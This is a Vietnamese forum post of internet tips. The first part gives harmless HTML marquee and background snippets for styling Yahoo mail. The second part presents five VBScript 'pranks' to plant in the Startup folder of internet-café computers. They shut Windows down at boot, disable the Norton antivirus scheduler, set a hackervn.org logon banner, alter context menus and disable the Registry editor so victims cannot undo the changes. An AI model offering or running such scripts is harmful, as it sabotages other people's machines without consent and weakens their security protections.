Thủ thuật của Nguyễn Đình Sơn - ĐHGTVT TPHCM gửu tất cả các bạn
Thủ thuật và mẹo vặt Internet
Viết mail Yahoo với chữ chạy từa lưa
Muốn làm được thì trước khi viết thư bạn phải nhấp vào ô có chữ HTML ở bên dưới khung message. Khi viết xong thì click vào ô HTML một lần nữa rồi nhấn send.
1/ Chữ chạy từ phải qua trái :
<marquee > <font size=6 nội dung mail</font></marquee>
2/ Chữ chạy từ trái qua phải :
<marquee direction="right"> <font size=6 color=blue> nội dung </font></marquee>
3/Chữ chạy loăng quăng trong màn hình : (dòm nhức đầu lun á )
<marquee behavior="alternate"> <font size=6 color=blue> nội dung </font></marquee>
4/Chữ chạy lên :
<marquee direction=up> <font size=6 color=blue> nội dung </marquee>
5/Chữ chạy xuống :
<marquee direction=down> <font size=6 color=blue> nội dung </marquee>
Chữ chạy có nền nhấp nháy :
1/ Từ phải qua trái :
<marquee > <font size=5 color=blue
style=background:url(http://members.aol.com/sunstar253/images/gliter.gif)> nội dung </font></marquee>
2/Từ trái qua phải :
<marquee direction="right"> <font size=5 color=blue
style=background:url(http://members.aol.com/sunstar253/images/gliter.gif)> nội dung </font></marquee>
3/Chạy long tong trong màn hình :
<marquee behavior="alternate"> <font size=5 color=blue
style=background:url(http://members.aol.com/sunstar253/images/gliter.gif)> nội dung </font></marquee>
4/Chạy lên :
<marquee direction=up> <font size=5 color=blue
style=background:url(http://members.aol.com/sunstar253/images/gliter.gif)> nội dung </font></marquee>
5/ Chạy xuống :
<marquee direction=down> <font size=5 color=blue
style=background:url(http://members.aol.com/sunstar253/images/gliter.gif)> nội dung </font></marquee>
Viết mail với hình nền rất đẹp :
Nền hoa hồng nở
<FONT color=blue size=5 style="BACKGROUND: url(http://members.aol.com/sunstar253/i...aturerose02.gif)">nội dung </FONT>
Nền Trăng khuyết
<FONT color=yellow size=5 style="BACKGROUND: url(http://members.aol.com/sunstar253/images/moonshow.gif)">nội dung </FONT>
Nếu bạn có địa chỉ của hình nền bạn thích thì thay vào như sau :
<FONT color=yellow size=5 style="BACKGROUND: url(địa chỉ hình nền thay vào)">nội dung </FONT>.
Chúc các bạn tạo được 1 lá mail như ý
Vài trò đùa khi ra hàng netSau đây là một vài trò chơi do tôi xiu tầm, bằng cách đặt một file (*.vbs) nằm trong thư mục Startup chứa một trong những đoạn script sau:
1.Trò chơi thứ nhất: không cho khởi động máy:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
2.Trò chơi thứ hai: disable NAV( nếu có install) của họ:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
3.Trò chơi thứ ba: hiển thị môt meesage mỗi khi họ reboot máy:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\"
s2 = "LegalNoticeCaption"
s3 = "LegalNoticeText"
wsh.RegWrite s1+s2, "Hackervn.org"
wsh.RegWrite s1+s3, "Robinhood invite you to join hackervn.org"
4.Trò chơi 4: hiển thị một dòng lệnh mỗi khi họ click vào một file hay folder:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\Hello I am Robinhood-come from hackervn.org\",""
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hello I am Robinhood-come from hackervn.org\","Robinhood"
5.Trò chơi này đảm bảo cho các trò chơi trên có thể diễn ra "vui vẻ": disable Registry của người ta :
Dim objShell
Set objShell = CreateObject( "WScript.Shell" )
s1 = "HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\"
s2 = "Policies\System\DisableRegistryTools"
objShell.RegWrite s1+s2,1, "REG_DWORD"
Trên đây là 5 trò chơi "khá vui", thật ra còn nhiểu trò chơi khác nữa nhưng "nguy hiểm" cho người ta nên thôi.
nếu ai làm ko được thì liên hệ với tui [email protected]
VnVista I-Shine
© http://vnvista.com